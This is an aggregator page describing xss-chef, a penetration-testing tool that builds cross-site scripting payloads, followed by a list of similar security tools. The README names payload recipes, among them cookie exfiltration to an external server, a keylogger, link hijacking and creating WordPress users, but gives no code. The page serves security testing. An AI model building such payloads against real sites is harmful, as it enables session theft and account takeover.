GitPlanet

Cheap and reliable Node.js hosting starts at $3/month, and $1/month static HTML hosting

Created with love in Canada, visit hostnodejs.com today

Feel like to post an Ad? Learn Details
All Projects → rastating → xss-chef

rastating / xss-chef

Licence: GPL-3.0 License
A web application for generating custom XSS payloads

Programming Languages

javascript
184084 projects - #8 most used programming language
CSS
56736 projects
HTML
75241 projects

Labels

reactsecurityxsspenetration-testingxss-exploitationwebsecxss-exploit

Projects that are alternatives of or similar to xss-chef

Cerberus
一款功能强大的漏洞扫描器,子域名爆破使用aioDNS,asyncio异步快速扫描,覆盖目标全方位资产进行批量漏洞扫描,中间件信息收集,自动收集ip代理,探测Waf信息时自动使用来保护本机真实Ip,在本机Ip被Waf杀死后,自动切换代理Ip进行扫描,Waf信息收集(国内外100+款waf信息)包括安全狗,云锁,阿里云,云盾,腾讯云等,提供部分已知waf bypass 方案,中间件漏洞检测(Thinkphp,weblogic等 CVE-2018-5955,CVE-2018-12613,CVE-2018-11759等),支持SQL注入, XSS, 命令执行,文件包含, ssrf 漏洞扫描, 支持自定义漏洞邮箱推送功能
Stars: ✭ 389 (+455.71%)
Mutual labels:  xss, penetration-testing
vulnerabilities
List of every possible vulnerabilities in computer security.
Stars: ✭ 14 (-80%)
Mutual labels:  xss, penetration-testing
Ezxss
ezXSS is an easy way for penetration testers and bug bounty hunters to test (blind) Cross Site Scripting.
Stars: ✭ 1,022 (+1360%)
Mutual labels:  xss, penetration-testing
Arachni
Web Application Security Scanner Framework
Stars: ✭ 2,942 (+4102.86%)
Mutual labels:  xss, penetration-testing
cd
CloudDefense.ai is an automated web application security testing tool that audits your web applications by checking for vulnerabilities like SQL Injection, Cross-site scripting and other exploitable vulnerabilities.
Stars: ✭ 33 (-52.86%)
Mutual labels:  xss, penetration-testing
Xsstrike
Most advanced XSS scanner.
Stars: ✭ 9,822 (+13931.43%)
Mutual labels:  xss, xss-exploit
Xssmap
XSSMap 是一款基于 Python3 开发用于检测 XSS 漏洞的工具
Stars: ✭ 134 (+91.43%)
Mutual labels:  xss, penetration-testing
Phpvuln
Audit tool to find common vulnerabilities in PHP source code
Stars: ✭ 146 (+108.57%)
Mutual labels:  xss, penetration-testing
Ary
Ary 是一个集成类工具,主要用于调用各种安全工具,从而形成便捷的一键式渗透。
Stars: ✭ 241 (+244.29%)
Mutual labels:  xss, penetration-testing
Xss Payload List
🎯 Cross Site Scripting ( XSS ) Vulnerability Payload List
Stars: ✭ 2,617 (+3638.57%)
Mutual labels:  xss, xss-exploitation
SuperXSS
Make XSS Great Again
Stars: ✭ 57 (-18.57%)
Mutual labels:  xss, xss-exploitation
vaf
Vaf is a cross-platform very advanced and fast web fuzzer written in nim
Stars: ✭ 294 (+320%)
Mutual labels:  xss, penetration-testing
Foxss-XSS-Penetration-Testing-Tool
Foxss is a simple php based penetration Testing Tool.Currently it will help to find XSS vulnerability in websites.
Stars: ✭ 35 (-50%)
Mutual labels:  xss, xss-exploitation
wasec
Examples of security features (or mishaps) on web applications -- these are mostly examples and tutorials from the WASEC book.
Stars: ✭ 74 (+5.71%)
Mutual labels:  xss
litewaf
Lightweight In-App Web Application Firewall for PHP
Stars: ✭ 32 (-54.29%)
Mutual labels:  xss
ng-dompurify
Inclusive Angular API for DOMPurify
Stars: ✭ 65 (-7.14%)
Mutual labels:  xss
cms identify
cms识别
Stars: ✭ 13 (-81.43%)
Mutual labels:  penetration-testing
Oracle-Pentesting-Reference
Oracle Database Penetration Testing Reference (10g/11g)
Stars: ✭ 34 (-51.43%)
Mutual labels:  penetration-testing
YAPS
Yet Another PHP Shell - The most complete PHP reverse shell
Stars: ✭ 35 (-50%)
Mutual labels:  penetration-testing
persistent-clientside-xss
Exploit generator and Taint Engine to find persistent (and reflected) client-side XSS
Stars: ✭ 19 (-72.86%)
Mutual labels:  xss
View All Similar Projects ➔

XSS Chef

Build Status Coverage Status

A web application for generating custom XSS payloads

What is XSS Chef?

XSS Chef is a small React.js application inspired by CyberChef, which provides users with a modular way to build JavaScript payloads to typically be used during penetration tests to demonstrate cross-site scripting vulnerabilities.

A live copy of the application can be found at https://rastating.github.io/xss-chef

What Can I Do with XSS Chef?

The current set of recipes can be found below, along with a description of what they allow you to do:

  • Alert - Display an alert in the user's browser
  • Body Replacer - Replace the inner HTML of the document body with custom markup
  • Cookie Exfiltrator - Exfiltrate one or more cookies to an external web server
  • Decimal Encoder - Encode the payload into a comma separated array of decimal numbers
  • Link Hijacker - Change the href attribute of all links on the page to point to a different URL
  • Keylogger - Log all key presses on the page and submit them back to a web server
  • String Exfiltrator - Request a resource from the target's browser and exfiltrate the data
  • WordPress: Create User - Create a new WordPress user account on the target system

How to Build

  • For a production build, run: yarn build
  • For a development build, run: yarn build-dev

Running Unit Tests

The unit tests can be run with jest: yarn jest

Want to Contribute?

If you're interested in helping to improve XSS Chef, below are some of the key things that I'd like to add at some point:

  • More recipes! - This can be application specific (like the existing WordPress payload) or generic recipes (such as the cookie exfiltrator)
  • Better mobile support - Although there is probably minimal use case for people to use the application on their mobile devices, it would be cool to iron out the bugs with the responsive design at low resolutions.
  • A better way to browse recipes - Currently, as there are limited recipes available, the existing approach works. As more are added, a categorised list would be better, to aid users in navigating the available recipes.
Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].